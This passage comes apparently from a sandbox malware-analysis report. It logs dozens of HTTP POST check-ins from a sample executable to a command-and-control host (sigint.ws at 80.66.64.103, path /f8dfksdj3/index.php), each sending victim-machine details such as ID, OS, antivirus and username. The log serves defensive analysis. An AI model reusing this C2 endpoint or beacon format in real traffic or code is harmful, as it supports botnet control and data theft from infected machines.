                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:57.073848009 CEST3491INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              102192.168.2.44987680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:57.279397011 CEST3492OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:57.464597940 CEST3492INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              103192.168.2.44987880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:57.842865944 CEST3511OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.024713993 CEST3512INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              104192.168.2.44988080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:58.245913982 CEST3530OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.427521944 CEST3531INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              105192.168.2.44988180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:58.640327930 CEST3531OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:58.824417114 CEST3532INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              106192.168.2.44988480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:59.033834934 CEST3546OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.216670990 CEST3563INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              107192.168.2.44988580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:59.420912981 CEST3579OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.605551004 CEST3579INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              108192.168.2.44988680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:59.808424950 CEST3580OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:59.993267059 CEST3580INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              109192.168.2.44988780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:00.209739923 CEST3581OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:00.393475056 CEST3581INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              11192.168.2.44978580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:59.351850033 CEST3407OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.532696009 CEST3407INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              110192.168.2.44988880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:00.609327078 CEST3582OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:00.790986061 CEST3582INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              111192.168.2.44988980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:00.995563984 CEST3583OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:01.179130077 CEST3583INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              112192.168.2.44989080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:01.415532112 CEST3584OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:01.599328041 CEST3584INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              113192.168.2.44989180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:01.891788006 CEST3585OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:02.072062969 CEST3585INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              114192.168.2.44989280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:02.407883883 CEST3586OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:02.590540886 CEST3590INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              115192.168.2.44989480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:03.266530037 CEST3590OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:03.449297905 CEST3591INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              116192.168.2.44989580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:03.704176903 CEST3592OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:03.884037971 CEST3603INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              117192.168.2.44989680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:05.115551949 CEST3603OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:05.297106981 CEST3604INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              118192.168.2.44989880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:05.537739992 CEST3604OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:05.718848944 CEST3604INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              119192.168.2.44989980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:55:05.935549974 CEST3605OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:55:06.119924068 CEST3606INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:55:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              12192.168.2.44978680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:59.792798996 CEST3408OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.973313093 CEST3408INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
